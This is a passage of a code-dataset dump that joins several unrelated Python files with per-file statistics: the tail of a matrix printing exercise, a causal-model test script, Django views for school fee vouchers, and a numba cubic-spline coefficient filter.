for j in range(0, 3, 1):
# elemento = int(input("Digite o elemento da posição [%d]: " % (i)))
linha.append(random.randint(10, 60))
if (i == j):
diagonalPrincipal.append(linha[i])
matriz.append(linha)
print()
# print(matriz)
for i in range(0, 3, 1):
for j in range(0, 3, 1):
print(f"[{matriz[j][i]}]", end='')
print()
print()
for i in range(0, 3, 1):
for j in range(0, 3, 1):
print(f"[{matriz[i][j]}]", end='')
print()
print()
print(diagonalPrincipal)
| 23.212121 | 76 | 0.571802 | 117 | 766 | 3.74359 | 0.401709 | 0.09589 | 0.109589 | 0.123288 | 0.246575 | 0.246575 | 0.246575 | 0.182648 | 0.182648 | 0.182648 | 0 | 0.050523 | 0.250653 | 766 | 32 | 77 | 23.9375 | 0.712544 | 0.279373 | 0 | 0.5 | 0 | 0 | 0.059041 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.045455 | 0.363636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d38b1f211f5c9e46f3fcd73adf617055c70c17 | 4,268 | py | Python | examples/forest_fire_disjunctive.py | kevinmcareavey/pyactualcausality | 51367d768dde3b1b039373db5797efb087003cd4 | [
"MIT"
] | null | null | null | examples/forest_fire_disjunctive.py | kevinmcareavey/pyactualcausality | 51367d768dde3b1b039373db5797efb087003cd4 | [
"MIT"
] | null | null | null | examples/forest_fire_disjunctive.py | kevinmcareavey/pyactualcausality | 51367d768dde3b1b039373db5797efb087003cd4 | [
"MIT"
] | null | null | null | from frozendict import frozendict
from lib.halpern_pearl import Variable, CausalNetwork, CausalSetting, find_actual_causes, CausalFormula, PrimitiveEvent, \
Negation, find_trivial_explanations, EpistemicState, find_nontrivial_explanations, find_explanations, \
find_sufficient_causes
U_L, U_MD = Variable("U_L"), Variable("U_MD")
FF, L, MD = Variable("FF"), Variable("L"), Variable("MD")
exogenous_domains = {
U_L: {False, True},
U_MD: {False, True}
}
endogenous_domains = {
FF: {False, True},
L: {False, True},
MD: {False, True}
}
causal_network = CausalNetwork()
causal_network.add_dependency(FF, [L, MD], lambda parent_values: parent_values[L] or parent_values[MD])
causal_network.add_dependency(L, [U_L], lambda parent_values: parent_values[U_L])
causal_network.add_dependency(MD, [U_MD], lambda parent_values: parent_values[U_MD])
context = {U_L: True, U_MD: True}
causal_setting = CausalSetting(causal_network, context, exogenous_domains, endogenous_domains)
event = PrimitiveEvent(FF, True)
# list(find_actual_causes(event, causal_setting))
causal_network.write("forest_fire_disjunctive.png")
actual_causes = {frozendict(actual_cause) for actual_cause in find_actual_causes(event, causal_setting)}
expected_actual_causes = [{FF: True}, {L: True, MD: True}]
assert actual_causes == {frozendict(expected_actual_cause) for expected_actual_cause in expected_actual_causes}
sufficient_causes = {frozendict(sufficient_cause) for sufficient_cause in find_sufficient_causes(event, causal_setting)}
expected_sufficient_causes = [{FF: True}, {L: True}, {FF: True, L: True}, {MD: True}, {FF: True, MD: True}, {L: True, MD: True}, {FF: True, L: True, MD: True}]
assert sufficient_causes == {frozendict(expected_sufficient_cause) for expected_sufficient_cause in expected_sufficient_causes}
assert CausalFormula({MD: False}, event).entailed_by(causal_setting) # (Md, (1, 1)) |= [MD ← 0](FF = 1) example from Page 21 [Halpern, 2016]
assert CausalFormula({L: False}, event).entailed_by(causal_setting) # (Md, (1, 1)) |= [L ← 0](FF = 1) example from Page 21 [Halpern, 2016]
assert CausalFormula({L: False, MD: False}, Negation(event)).entailed_by(causal_setting) # (Md, (1, 1)) |= [L ← 0; MD ← 0](FF = 0) example from Page 21 [Halpern, 2016]
u0 = {U_L: False, U_MD: False}
u1 = {U_L: True, U_MD: False}
u2 = {U_L: False, U_MD: True}
u3 = {U_L: True, U_MD: True}
k1 = EpistemicState(causal_network, [u0, u1, u2, u3], exogenous_domains, endogenous_domains)
k2 = EpistemicState(causal_network, [u0, u1, u2], exogenous_domains, endogenous_domains)
k3 = EpistemicState(causal_network, [u0, u1, u3], exogenous_domains, endogenous_domains)
k4 = EpistemicState(causal_network, [u1, u3], exogenous_domains, endogenous_domains)
epistemic_states = [k1, k2, k3, k4]
explanations = [{frozendict(explanation) for explanation in find_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_explanations = [
[{FF: True}, {L: True}, {MD: True}],
[{FF: True}, {L: True}, {MD: True}],
[{FF: True}, {L: True}, {MD: True}],
[{FF: True}, {L: True}, {MD: True}]
]
assert explanations == [{frozendict(expected_explanation) for expected_explanation in epistemic_state} for epistemic_state in expected_explanations]
trivial_explanations = [{frozendict(trivial_explanation) for trivial_explanation in find_trivial_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_trivial_explanations = [
[{FF: True}],
[{FF: True}],
[{FF: True}, {L: True}],
[{FF: True}, {L: True}]
]
assert trivial_explanations == [{frozendict(expected_trivial_explanation) for expected_trivial_explanation in epistemic_state} for epistemic_state in expected_trivial_explanations]
nontrivial_explanations = [{frozendict(nontrivial_explanation) for nontrivial_explanation in find_nontrivial_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_nontrivial_explanations = [
[{L: True}, {MD: True}],
[{L: True}, {MD: True}],
[{MD: True}],
[{MD: True}]
]
assert nontrivial_explanations == [{frozendict(expected_nontrivial_explanation) for expected_nontrivial_explanation in epistemic_state} for epistemic_state in expected_nontrivial_explanations]
| 56.157895 | 192 | 0.751172 | 576 | 4,268 | 5.307292 | 0.125 | 0.026169 | 0.042525 | 0.035983 | 0.436703 | 0.384037 | 0.266928 | 0.251881 | 0.242395 | 0.168466 | 0 | 0.014635 | 0.119494 | 4,268 | 75 | 193 | 56.906667 | 0.797765 | 0.061621 | 0 | 0.107692 | 0 | 0 | 0.00975 | 0.00675 | 0 | 0 | 0 | 0 | 0.123077 | 1 | 0 | false | 0 | 0.030769 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d42b43218cec56ddb7aa37023d60517545e56a | 23,816 | py | Python | fee/views.py | masoodazhar/-school-management-system | 6525b3d29d12f03e05d362d81b7c5855806f57d9 | [
"Apache-2.0"
] | 1 | 2022-01-20T10:20:05.000Z | 2022-01-20T10:20:05.000Z | fee/views.py | masoodazhar/-school-management-system | 6525b3d29d12f03e05d362d81b7c5855806f57d9 | [
"Apache-2.0"
] | null | null | null | fee/views.py | masoodazhar/-school-management-system | 6525b3d29d12f03e05d362d81b7c5855806f57d9 | [
"Apache-2.0"
] | 1 | 2022-01-20T10:20:31.000Z | 2022-01-20T10:20:31.000Z | from django.shortcuts import render, redirect
from student.models import Admission
from .forms import SearchChallan
from django.utils import timezone
from django.db.models import Q
from .models import Voucher
from payroll.models import Salary
from django import forms
from django.contrib import messages
from django.urls import reverse_lazy
from django import forms
from django.db.models import Sum, Count
from django.http import HttpResponse, JsonResponse
import datetime
import json
from academic.models import Section, Classes
from num2words import num2words
# Create your views here.
from django.contrib.auth.mixins import PermissionRequiredMixin
from home.decorators import allowed_users
from django.contrib.auth.decorators import login_required
from payroll.models import Teacher
from home.views import SchoolProfile
from django.contrib.auth.models import User
# Fee section
class FeeDefSerchForm(forms.Form):
seacher_date = forms.CharField(
widget = forms.TextInput(
attrs = {
'class': 'date seacher_date',
'value': timezone.now().strftime('%Y-%m-%d')
}
)
)
class VoucherForm(forms.ModelForm):
class Meta:
model = Voucher
fields = '__all__'
def convert_month(month_val):
if len(str(month_val))<2:
return '0'+str(month_val)
else:
return month_val
def generate_voucher_number(number):
""" NEED AN INTEGER generate_voucher_number(number objects) """
sno = ''
number = int(number)+1
number = str(number)
if len(number)<2:
sno = '00000000'+number
elif len(number)<3:
sno = '0000000'+number
elif len(number)<4:
sno = '000000'+number
elif len(number)<5:
sno = '00000'+number
elif len(number)<6:
sno = '0000'+number
elif len(number)<7:
sno = '000'+number
elif len(number)<8:
sno = '00'+number
elif len(number)<9:
sno = '0'+number
else:
sno = number
return sno
@login_required
# @allowed_users('add_voucher')
def fee_main(request):
month = timezone.now().strftime("%m")
current_month = timezone.now().strftime("%Y-%m-%d")
year = timezone.now().strftime("%Y")
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
# GETTING MONTHLY FEE
current_month_total_fee = Voucher.objects.filter(
month=month,
fee_month=current_month,
year=year,
module_holder=module_holder
).aggregate(current_month_total_fee=Sum('monthly_tution_fee_paid'))
# GETTING YEALY FEE
current_year_total_fee = Voucher.objects.filter(
year=year,
module_holder=module_holder
).aggregate(current_year_total_fee=Sum('monthly_tution_fee_paid'))
# GETTING MONTHLY SALARY TOTAL
current_month_total_salary = Salary.objects.filter(
Q(Salary_date__startswith=timezone.now().strftime('%Y-%m'),
module_holder=module_holder)
).aggregate(monthly_salary=Sum('salary'))
# GETTING yearly SALARY TOTAL
current_year_total_salary = Salary.objects.filter(
Q(Salary_date__startswith=timezone.now().strftime('%Y'),
module_holder=module_holder)
).aggregate(yearly_salary=Sum('salary'))
print(current_month_total_salary,'====================================')
# # GETTING UNPAID VOUCHER MONTHLY
# current_unpaid_Vouchers_monthly = Voucher.objects.filter(
# month = month,
# year = year,
# monthly_tution_fee_paid=0,
# module_holder=module_holder
# ).count()
# # GETTING UNPAID VOUCHER YEARLY
# current_unpaid_Vouchers_yearly = Voucher.objects.filter(
# year = year,
# monthly_tution_fee_paid=0,
# module_holder=module_holder
# ).count()
data_chart= []
for month in range(1, 13):
paid = Voucher.objects.filter(module_holder=module_holder, year=year, month=convert_month(month), monthly_tution_fee_paid__gt=1).aggregate(paid = Sum('monthly_tution_fee_paid'))
unpaid = Voucher.objects.filter(module_holder=module_holder, year=year, month=convert_month(month), monthly_tution_fee_paid__lt=1).aggregate(unpaid = Sum('monthly_tution_fee') )
data_chart.append({
'paid': paid,
'unpaid': unpaid,
'date': year+'-'+str(convert_month(month))+'-'+'01'
})
final_chart=[]
for data in data_chart:
if data['paid']['paid'] is None:
paid = 0
else:
paid = data['paid']['paid']
if data['unpaid']['unpaid'] is None:
unpaid = 0
else:
unpaid = data['unpaid']['unpaid']
final_chart.append({
'paid_amount': paid,
'un_paid_amount': unpaid,
'date': data['date'],
})
print(final_chart)
ddddd = json.dumps(final_chart)
context = {
'data_chart': final_chart,
'ddddd': ddddd,
'current_year_total_salary':current_year_total_salary,
'current_month_total_salary': current_month_total_salary,
'current_month_total_fee': current_month_total_fee,
'current_year_total_fee': current_year_total_fee,
# 'current_unpaid_Vouchers_monthly': current_unpaid_Vouchers_monthly,
# 'current_unpaid_Vouchers_yearly': current_unpaid_Vouchers_yearly,
'current_month': timezone.now().strftime('%B, %Y'),
'current_month_redirect': timezone.now().strftime('%Y-%m-%d'),
'current_year': timezone.now().strftime('%Y'),
'current_month_total_fee': current_month_total_fee
}
return render(request,'fee/main.html', context)
@login_required
@allowed_users('view_voucher')
def fee_received(request, date):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
if len(date)>4:
searched_data_month = Voucher.objects.filter(module_holder=module_holder, month=date.split('-')[1], fee_month=date, year=date.split('-')[0], monthly_tution_fee_paid__gt=1)
else:
searched_data_month = Voucher.objects.filter(module_holder=module_holder, year=date, monthly_tution_fee_paid__gt=1)
context = {
'searched_data_month': searched_data_month
}
return render(request, 'fee/fee_received.html', context)
@login_required
# @allowed_users('view_voucher')
def GenerateChallan(request):
all_vouchers = []
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
if request.method=='POST':
search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
if search_form.is_valid():
class_id = request.POST.get('classes')
section_id = request.POST.get('admission_section')
# issue_date = request.POST.get('issue_date'),
# due_date = request.POST.get('due_date'),
# fee_month = request.POST.get('fee_month'),
year = request.POST.get('fee_month').split('-')[0],
year = year[0]
all_std = Admission.objects.filter(module_holder=module_holder, admission_class=class_id, admission_section=section_id)
# print('===================\n', request.POST)
for data in all_std:
search_voucher_data = Voucher.objects.filter(
student_name=Admission.objects.get(pk=data.pk),
father_name=data.father_name,
month=request.POST.get('fee_month').split('-')[1],
year=year,
module_holder=module_holder
)
if search_voucher_data.exists():
search_voucher_data.update(issue_date=request.POST.get('issue_date'),due_date=request.POST.get('due_date'))
messages.success(request, 'Data has been updated & ready to print')
else:
messages.success(request, 'Data has been Saved & ready to print')
if Voucher.objects.count()>0:
challan_number = Voucher.objects.values('id').latest('id')['id']
else:
challan_number ='0'
#COLCULATING FEE WITH ADMISSION DATE
monthly_tution_fee_divided_in_days = 0
admission_date = str(data.admission_date).split('-')
admission_year = int(admission_date[0])
admission_month = int(admission_date[1])
admission_day = int(admission_date[2])
challan_year = int(request.POST.get('fee_month').split('-')[0])
challan_month = int(request.POST.get('fee_month').split('-')[1])
if(admission_year==challan_year and admission_month==challan_month):
monthly_tut_fee = data.monthly_tution_fee
per_day_fee = monthly_tut_fee/30
days_of_fee = 30-admission_day
monthly_tution_fee_divided_in_days = per_day_fee*days_of_fee
else:
monthly_tution_fee_divided_in_days = data.monthly_tution_fee
if(admission_year<=challan_year and admission_month<=challan_month):
save_voucher = Voucher(
reg_number= data.admission_registration,
student_name=Admission.objects.get(pk=data.pk),
father_name=data.father_name,
issue_date=request.POST.get('issue_date'),
due_date=request.POST.get('due_date'),
fee_month=request.POST.get('fee_month'),
month= request.POST.get('fee_month').split('-')[1] ,
year=year,
challan_number=generate_voucher_number(challan_number),
monthly_tution_fee= monthly_tution_fee_divided_in_days,
section=data.admission_section,
class_name= data.admission_class,
module_holder = module_holder
).save()
all_vouchers_single = Voucher.objects.filter(
student_name=Admission.objects.get(pk=data.pk),
father_name=data.father_name,
month=request.POST.get('fee_month').split('-')[1],
year=year,
)
all_vouchers.append({'voucher':all_vouchers_single})
else:
search_form = SearchChallan(module_holder ,initial={'year':timezone.now().strftime('%Y')})
context = {
'search_form': search_form,
'all_student': all_vouchers,
'current_month': timezone.now().strftime('%B, %Y'),
'current_year': timezone.now().strftime('%Y')
}
return render(request, 'fee/generate_challan.html', context)
@login_required
# @allowed_users('view_voucher')
def generated_challan(request):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
murge_data = []
if request.method=='POST':
print(request.POST)
index=0
for datas in request.POST.getlist('pk'):
data = {
'reg_number': request.POST.getlist('reg_number')[int(datas)],
'student_name':request.POST.getlist('name_of_student')[int(datas)],
'father_name':request.POST.getlist('father_name')[int(datas)],
'issue_date':request.POST.get('issue_date'),
'due_date':request.POST.get('due_date'),
'fee_month':request.POST.get('fee_month'),
'year':request.POST.get('year'),
'challan_number':request.POST.getlist('challan_number')[int(datas)],
'monthly_tution_fee': request.POST.getlist('monthly_tution_fee')[int(datas)],
'section': request.POST.getlist('admission_section')[int(datas)],
'class_name': request.POST.getlist('admission_class')[int(datas)],
'monthly_tution_fee_in_word': num2words(request.POST.getlist('monthly_tution_fee')[int(datas)])
}
for ps in range(0, 2):
copy = ''
if ps is 0:
copy="Parent's Copy"
else:
copy="School Copy"
murge_data.append({
'copy': copy,
'data': data
})
# if Voucher.objects.count()>0:
# challan_number = Voucher.objects.values('id').latest('id')['id']
# else:
# challan_number ='0'
# save_voucher = Voucher(
# reg_number= request.POST.getlist('reg_number')[index],
# student_name=Admission.objects.get(name_of_student=request.POST.getlist('name_of_student')[index]),
# father_name=request.POST.getlist('father_name')[index],
# issue_date=request.POST.get('issue_date'),
# due_date=request.POST.get('due_date'),
# fee_month=request.POST.get('fee_month'),
# month= request.POST.get('fee_month').split('-')[1] ,
# year=request.POST.get('year'),
# challan_number=generate_voucher_number(challan_number),
# monthly_tution_fee= request.POST.getlist('monthly_tution_fee')[index],
# section= Section.objects.get(section_name=request.POST.getlist('admission_section')[index]) ,
# class_name= Classes.objects.get(class_name=request.POST.getlist('admission_class')[index]) ,
# module_holder = 'masood'
# ).save()
# voucher_form = VoucherForm(request.POST)
# if voucher_form.is_valid():
# save_voucher.save()
index = index+1
user = User.objects.get(username=module_holder)
school_profile = SchoolProfile.objects.filter(username=user.pk).first()
# print('==================user profile', school_profile.school_logo.url)
context = {
'school_profile': school_profile,
'murge_data': murge_data,
'current_month': timezone.now().strftime('%B, %Y'),
'current_year': timezone.now().strftime('%Y')
}
return render(request, 'fee/generated_challan.html', context)
@login_required
@allowed_users('view_voucher')
def UnpaidChallan(request):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
all_vouchers = []
if request.method=='POST':
search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
if search_form.is_valid():
# print(request.POST,'========form is valid')
search_voucher_data = Voucher.objects.filter(
class_name=Classes.objects.get(pk=request.POST.get('classes')),
section = Section.objects.get(pk=request.POST.get('admission_section')),
# issue_date = request.POST.get('issue_date'),
# due_date = request.POST.get('due_date'),
# fee_month = request.POST.get('fee_month'),
month=request.POST.get('fee_month').split('-')[1],
year=request.POST.get('year'),
module_holder = module_holder
)
status = 0
for data in search_voucher_data:
if data.monthly_tution_fee_paid>0:
status = data.monthly_tution_fee_paid
else:
status = 0
all_vouchers.append({
'pk':data.pk,
'challan_number':data.challan_number,
'reg_number':data.reg_number ,
'monthly_tution_fee':data.monthly_tution_fee ,
'status':status,
'student_name':data.student_name ,
'father_name':data.father_name,
'section':data.section ,
'class_name':data.class_name ,
})
if len(all_vouchers)>0:
print("not empty")
else:
messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
else:
search_form = SearchChallan(module_holder, initial={'year':timezone.now().strftime('%Y')})
context = {
'search_form': search_form,
'all_student': all_vouchers,
'current_month': timezone.now().strftime('%B, %Y'),
'current_year': timezone.now().strftime('%Y')
}
return render(request, 'fee/unpaid_challan.html', context)
@login_required
@allowed_users('view_voucher')
def payChallan(request):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
all_vouchers = []
if request.method=='POST':
search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
if search_form.is_valid():
# print(request.POST, 'this is valid=============')
for pk_index in request.POST.getlist('pk'):
pk = pk_index.split('-')[0]
index = pk_index.split('-')[1]
get_voucher_data = Voucher.objects.filter(pk=pk).update(
monthly_tution_fee_paid=request.POST.getlist('monthly_tution_fee')[int(index)]
)
search_voucher_data = Voucher.objects.filter(
class_name=request.POST.get('classes'),
section =request.POST.get('admission_section'),
# issue_date = request.POST.get('issue_date'),
# due_date = request.POST.get('due_date'),
month=request.POST.get('fee_month').split('-')[1],
year=request.POST.get('year'),
module_holder = module_holder
)
status = 0
for data in search_voucher_data:
if data.monthly_tution_fee_paid>0:
status = data.monthly_tution_fee_paid
else:
status = 0
all_vouchers.append({
'pk':data.pk,
'challan_number':data.challan_number,
'reg_number':data.reg_number ,
'monthly_tution_fee':data.monthly_tution_fee ,
'status':status,
'student_name':data.student_name ,
'father_name':data.father_name,
'section':data.section ,
'class_name':data.class_name
})
if len(all_vouchers)>0:
print("not empty")
else:
messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate Challan ")
else:
search_form = SearchChallan(module_holder, initial={'year':timezone.now().strftime('%Y')})
context = {
'search_form': search_form,
'all_student': all_vouchers,
'now': timezone.now().strftime('%m/%d/%Y')
}
return render(request, 'fee/unpaid_challan.html', context)
@login_required
@allowed_users('view_voucher')
def fee_defaulter(request):
if request.user.is_staff:
module_holder = request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
module_holder = this_holder.module_holder
all_vouchers = []
date = timezone.now().strftime('%Y-%m-%d')
if request.method=='GET':
search_voucher_data = Voucher.objects.filter(
Q(monthly_tution_fee_paid__lt=1,
month=date.split('-')[1],
year=date.split('-')[0],
module_holder = module_holder)
)
if request.method=='POST':
Feedefserchform = FeeDefSerchForm(request.POST)
search_voucher_data = Voucher.objects.filter(
Q(monthly_tution_fee_paid__lt=1,
month=request.POST.get('seacher_date').split('-')[1],
year=request.POST.get('seacher_date').split('-')[0],
module_holder = module_holder)
)
if search_voucher_data:
print(search_voucher_data, 'this is valid=============')
index = 0
for pk_id in request.POST.getlist('pk'):
get_voucher_data = Voucher.objects.filter(pk=pk_id).update(
monthly_tution_fee_paid=request.POST.getlist('monthly_tution_fee')[index]
)
index = index+1
messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
else:
messages.warning(request," There is no fee defaulter in this month ")
else:
Feedefserchform = FeeDefSerchForm()
status = 0
for data in search_voucher_data:
if data.monthly_tution_fee_paid>0:
status = data.monthly_tution_fee_paid
else:
status = 0
all_vouchers.append({
'pk':data.pk,
'challan_number':data.challan_number,
'reg_number':data.reg_number ,
'monthly_tution_fee':data.monthly_tution_fee ,
'status':status,
'student_name':data.student_name ,
'father_name':data.father_name,
'section':data.section ,
'class_name':data.class_name ,
})
if len(search_voucher_data)>0:
print("not empty")
else:
messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
context = {
'all_student': all_vouchers,
'Feedefserchform': Feedefserchform,
'current_month': timezone.now().strftime('%B, %Y'),
'current_year': timezone.now().strftime('%Y')
}
return render(request,'fee/fee_defaulter.html', context) | 41.204152 | 187 | 0.570961 | 2,569 | 23,816 | 5.038147 | 0.087583 | 0.057792 | 0.050684 | 0.02936 | 0.70316 | 0.63996 | 0.589817 | 0.551263 | 0.502666 | 0.486595 | 0 | 0.007044 | 0.314494 | 23,816 | 578 | 188 | 41.204152 | 0.785741 | 0.105097 | 0 | 0.470588 | 0 | 0 | 0.118384 | 0.019932 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020362 | false | 0 | 0.052036 | 0 | 0.104072 | 0.020362 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d4708d8f3e8cbb68ded6ad9426b4bdf6c6ba43 | 6,211 | py | Python | interpolation/splines/filter_cubic.py | gboehl/interpolation.py | 25520556804dd104c5931c8a6bedfff65420025f | [
"BSD-2-Clause"
] | null | null | null | interpolation/splines/filter_cubic.py | gboehl/interpolation.py | 25520556804dd104c5931c8a6bedfff65420025f | [
"BSD-2-Clause"
] | null | null | null | interpolation/splines/filter_cubic.py | gboehl/interpolation.py | 25520556804dd104c5931c8a6bedfff65420025f | [
"BSD-2-Clause"
] | null | null | null | from __future__ import division
import numpy as np
import time
from numba import jit, njit
# used by njitted routines (frozen)
basis = np.array([1.0 / 6.0, 2.0 / 3.0, 1.0 / 6.0, 0.0])
@njit(cache=True)
def solve_deriv_interp_1d(bands, coefs):
M = coefs.shape[0] - 2
# Solve interpolating equations
# First and last rows are different
bands[0, 1] /= bands[0, 0]
bands[0, 2] /= bands[0, 0]
bands[0, 3] /= bands[0, 0]
bands[0, 0] = 1.0
bands[1, 1] -= bands[1, 0] * bands[0, 1]
bands[1, 2] -= bands[1, 0] * bands[0, 2]
bands[1, 3] -= bands[1, 0] * bands[0, 3]
bands[0, 0] = 0.0
bands[1, 2] /= bands[1, 1]
bands[1, 3] /= bands[1, 1]
bands[1, 1] = 1.0
# Now do rows 2 through M+1
for row in range(2, M + 1):
bands[row, 1] -= bands[row, 0] * bands[row - 1, 2]
bands[row, 3] -= bands[row, 0] * bands[row - 1, 3]
bands[row, 2] /= bands[row, 1]
bands[row, 3] /= bands[row, 1]
bands[row, 0] = 0.0
bands[row, 1] = 1.0
# Do last row
bands[M + 1, 1] -= bands[M + 1, 0] * bands[M - 1, 2]
bands[M + 1, 3] -= bands[M + 1, 0] * bands[M - 1, 3]
bands[M + 1, 2] -= bands[M + 1, 1] * bands[M, 2]
bands[M + 1, 3] -= bands[M + 1, 1] * bands[M, 3]
bands[M + 1, 3] /= bands[M + 1, 2]
bands[M + 1, 2] = 1.0
coefs[M + 1] = bands[(M + 1), 3]
# Now back substitute up
for row in range(M, 0, -1):
coefs[row] = bands[row, 3] - bands[row, 2] * coefs[row + 1]
# Finish with first row
coefs[0] = bands[0, 3] - bands[0, 1] * coefs[1] - bands[0, 2] * coefs[2]
@njit(cache=True)
def find_coefs_1d(delta_inv, M, data, coefs):
bands = np.zeros((M + 2, 4))
# Setup boundary conditions
abcd_left = np.zeros(4)
abcd_right = np.zeros(4)
# Left boundary
abcd_left[0] = 1.0 * delta_inv * delta_inv
abcd_left[1] = -2.0 * delta_inv * delta_inv
abcd_left[2] = 1.0 * delta_inv * delta_inv
abcd_left[3] = 0
# Right boundary
abcd_right[0] = 1.0 * delta_inv * delta_inv
abcd_right[1] = -2.0 * delta_inv * delta_inv
abcd_right[2] = 1.0 * delta_inv * delta_inv
abcd_right[3] = 0
for i in range(4):
bands[0, i] = abcd_left[i]
bands[M + 1, i] = abcd_right[i]
for i in range(M):
for j in range(3):
bands[i + 1, j] = basis[j]
bands[i + 1, 3] = data[i]
solve_deriv_interp_1d(bands, coefs)
@njit(cache=True)
def filter_coeffs_1d(dinv, data):
M = data.shape[0]
N = M + 2
coefs = np.zeros(N)
find_coefs_1d(dinv[0], M, data, coefs)
return coefs
@njit(cache=True)
def filter_coeffs_2d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Nx = Mx + 2
Ny = My + 2
coefs = np.zeros((Nx, Ny))
# First, solve in the X-direction
for iy in range(My):
# print(data[:,iy].size)
# print(spline.coefs[:,iy].size)
find_coefs_1d(dinv[0], Mx, data[:, iy], coefs[:, iy])
# Now, solve in the Y-direction
for ix in range(Nx):
find_coefs_1d(dinv[1], My, coefs[ix,:], coefs[ix,:])
return coefs
@njit(cache=True)
def filter_coeffs_3d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Mz = data.shape[2]
Nx = Mx + 2
Ny = My + 2
Nz = Mz + 2
coefs = np.zeros((Nx, Ny, Nz))
for iy in range(My):
for iz in range(Mz):
find_coefs_1d(dinv[0], Mx, data[:, iy, iz], coefs[:, iy, iz])
# Now, solve in the Y-direction
for ix in range(Nx):
for iz in range(Mz):
find_coefs_1d(dinv[1], My, coefs[ix,:, iz], coefs[ix,:, iz])
# Now, solve in the Z-direction
for ix in range(Nx):
for iy in range(Ny):
find_coefs_1d(dinv[2], Mz, coefs[ix, iy,:], coefs[ix, iy,:])
return coefs
@njit(cache=True)
def filter_coeffs_4d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Mz = data.shape[2]
Mz4 = data.shape[3]
Nx = Mx + 2
Ny = My + 2
Nz = Mz + 2
Nz4 = Mz4 +2
coefs = np.zeros((Nx, Ny, Nz, Nz4))
# First, solve in the X-direction
for iy in range(My):
for iz in range(Mz):
for iz4 in range(Mz4):
find_coefs_1d(dinv[0], Mx, data[:, iy, iz, iz4], coefs[:, iy, iz, iz4])
# Now, solve in the Y-direction
for ix in range(Nx):
for iz in range(Mz):
for iz4 in range(Mz4):
find_coefs_1d(dinv[1], My, coefs[ix, :, iz, iz4], coefs[ix, :, iz, iz4])
# Now, solve in the Z-direction
for ix in range(Nx):
for iy in range(Ny):
for iz4 in range(Mz4):
find_coefs_1d(dinv[2], Mz, coefs[ix, iy, :, iz4], coefs[ix, iy, :, iz4])
# Now, solve in the Z4-direction
for ix in range(Nx):
for iy in range(Ny):
for iz in range(Nz):
find_coefs_1d(dinv[3], Mz4, coefs[ix, iy, iz, :], coefs[ix, iy, iz, :])
return coefs
def filter_coeffs(smin, smax, orders, data):
smin = np.array(smin, dtype=float)
smax = np.array(smax, dtype=float)
dinv = (smax - smin) / orders
data = data.reshape(orders)
return filter_data(dinv, data)
def filter_mcoeffs(smin, smax, orders, data):
order = len(smin)
n_splines = data.shape[-1]
coefs = np.zeros(tuple([i + 2 for i in orders])+(n_splines,) )
for i in range(n_splines):
coefs[...,i] = filter_coeffs(smin, smax, orders, data[..., i])
return coefs
def filter_data(dinv, data):
if len(dinv) == 1:
return filter_coeffs_1d(dinv, data)
elif len(dinv) == 2:
return filter_coeffs_2d(dinv, data)
elif len(dinv) == 3:
return filter_coeffs_3d(dinv, data)
elif len(dinv) == 4:
return filter_coeffs_4d(dinv, data)
#
if __name__ == "__main__":
import numpy
dinv = numpy.ones(3, dtype=float)*0.5
coeffs_0 = numpy.random.random([10,10,10])
coeffs_1 = numpy.random.random([100,100,100])
print(coeffs_0[:2,:2,:2])
import time
t1 = time.time()
filter_coeffs_3d(dinv, coeffs_0)
t2 = time.time()
filter_coeffs_3d(dinv, coeffs_1)
t3 = time.time()
print('Elapsed : {}'.format(t2-t1))
print('Elapsed : {}'.format(t3-t2))
